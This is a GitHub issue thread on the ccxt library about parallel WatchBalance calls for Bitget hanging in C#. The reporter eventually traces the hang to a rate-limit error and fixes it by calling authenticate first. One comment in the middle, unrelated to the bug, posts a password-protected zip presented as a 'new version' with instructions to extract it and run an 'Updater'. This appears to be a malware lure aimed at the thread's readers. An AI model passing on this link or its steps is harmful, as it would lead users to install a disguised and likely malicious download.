### ISSUE TITLE
Parallel WatchBalance for Bitget does not send all request. C#

### ISSUE THREAD

**Issue by skuvv** [ccxt/ccxt#22037]
### Operating System

Windows 10

### CCXT Version

4.2.88

### Description

When I send WatchBalance in parallel task, only one of request is send.

### Code

```
var exchange = new ccxt.pro.Bitget();

var task1 = Task.Run(async () =>
{
    try
    {
        Dictionary<string, object> _balanceParams = new Dictionary<string, object>();
        _balanceParams.Add("type", "spot");
        var balanceSpot = await exchange.WatchBalance(_balanceParams);
        Console.WriteLine("spot received");
    }
    catch (Exception e)
    {
        Console.WriteLine(e);
    }
});

var task2 = Task.Run(async () =>
{
    try
    {
        Dictionary<string, object> _balanceParams = new Dictionary<string, object>();
        _balanceParams.Add("type", "future");
        var balanceFuture = await exchange.WatchBalance(_balanceParams);
        Console.WriteLine("future received");
    }
    catch (Exception e)
    {
        Console.WriteLine(e);
    }
});

Task.WhenAll(task1, task2).Wait();

```
WhenAll is never completed

**Comment by skuvv** [comment]
Solution for reproduce:
[DemoForDebug.zip](https://github.com/ccxt/ccxt/files/14851085/DemoForDebug.zip)

**Comment by pcriadoperez** [comment]
Hi @skuvv , thanks for reporting and providing the example! I'm looking into it and will get back to you shortly

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.

**Comment by skuvv** [comment]
Found a clue for this problem when attached source version of ccxt:
```
On message: {"event":"error","code":30006,"msg":"request too many"}
System.Exception: ccxt.ExchangeError: bitget {"event":"error","code":30006,"msg":"request too many"}
```
Caused by calling **authenticate**.
Using ```await exchange.authenticate();``` solves problem.
